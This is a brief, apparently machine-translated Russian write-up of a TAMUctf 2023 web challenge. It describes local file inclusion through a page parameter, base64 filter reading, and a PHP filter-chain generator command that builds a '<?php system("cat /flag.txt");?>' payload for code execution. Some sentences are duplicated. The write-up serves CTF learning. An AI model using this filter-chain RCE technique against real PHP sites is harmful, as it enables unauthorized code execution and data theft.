TAMUctf 2023 - запись черного ящика

May 01 2023
Этот вызов создан г-ном Блейдом. Мы видим, что он загружает страницу входа с параметром страницы.

Этот вызов создан мистером Блейдом.

Мы видим, что он загружает страницу входа с параметром страницы .

Пронумеруем файлы. Сначала я попробовал admin и использовал кодировщики base64.

Когда мы расшифруем это, мы сможем получить путь к flag.txt.

<center>
<h1><?php include('/flag.txt'); ?></h1>
</center>

Я используюhttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
чтобы получить РВП.

python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Спасибо за прочтение.

Удачного взлома!